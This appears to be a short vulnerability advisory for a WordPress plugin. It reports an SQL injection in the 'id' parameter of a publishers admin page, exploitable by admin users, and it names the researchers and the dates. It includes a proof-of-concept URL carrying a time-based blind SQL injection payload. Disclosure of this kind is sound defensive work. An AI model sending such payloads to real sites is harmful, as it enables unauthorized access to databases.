The plugin does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin
https://example.com/wp-admin/admin.php?page=wsysadmin_publishers&action=delete&id=0,1)+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA
Daniel Krohmer, Kunal Sharma
Daniel Krohmer
Yes
2022-12-09 (about 5 months ago)
2022-12-09 (about 5 months ago)
2022-12-09 (about 5 months ago)